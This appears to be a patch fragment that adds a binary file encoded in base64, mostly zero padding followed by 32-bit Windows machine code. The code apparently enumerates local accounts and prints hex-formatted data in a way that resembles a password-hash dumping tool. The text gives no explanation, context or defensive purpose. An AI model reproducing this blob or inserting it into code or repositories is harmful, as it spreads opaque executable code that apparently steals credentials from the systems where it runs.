+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFZo6HAAEP8V
+FGAAEIs1jGAAEGjccAAQUKOcfwAQ/9ajhH8AEKGcfwAQaMxwABBQ/9aLDZx/ABBovHAAEFGjiH8A
+EP/WixWcfwAQaKBwABBSo6B/ABD/1qOUfwAQoZx/ABBohHAAEFD/1osNnH8AEGhkcAAQUaOMfwAQ
+/9aLFZx/ABBoQHAAEFKjkH8AEP/Wo4B/ABChnH8AEGgwcAAQUP/Wiw2EfwAQo5h/ABCFyV50RosN
+iH8AEIXJdDyLDaB/ABCFyXQyiw2UfwAQhcl0KIsNjH8AEIXJdB6LDZB/ABCFyXQUiw2AfwAQhcl0
+CoXAdAa4AQAAAMMzwMOQkJCQkJCB7OwDAACNRCQAg8n/Vou0JPgDAABXagBQi/4zwPKu99FJUYuM
+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
